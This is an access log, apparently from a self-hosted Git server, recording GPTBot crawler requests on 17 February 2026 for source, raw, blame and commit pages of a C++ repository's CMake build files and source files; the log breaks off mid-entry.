"/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject" -[17/Feb/2026:15:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10421] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19494] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" -[17/Feb/2026:15:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10883] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build" -[17/Feb/2026:15:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject" [Client 74.7.227.38] [Length 10727] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" -[17/Feb/2026:15:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode" [Client 74.7.227.38] [Length 10142] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" -[17/Feb/2026:15:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11406] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" -[17/Feb/2026:15:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10400] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm" -[17/Feb/2026:15:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm" -[17/Feb/2026:15:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10396] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm" -[17/Feb/2026:15:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm" -[17/Feb/2026:15:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10396] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm" -[17/Feb/2026:15:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11146] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14159] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10163] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject" -[17/Feb/2026:15:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11406] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject" -[17/Feb/2026:15:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11877] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode" -[17/Feb/2026:15:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14727] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11305] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21338] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject" -[17/Feb/2026:15:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode" -[17/Feb/2026:15:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11068] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11105] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10240] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10228] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31151] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10663] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10004] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10467] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10397] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm" -[17/Feb/2026:15:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72034] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" -[17/Feb/2026:15:14:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72684] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" -[17/Feb/2026:15:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10191] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build" -[17/Feb/2026:15:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10196] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build" -[17/Feb/2026:15:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 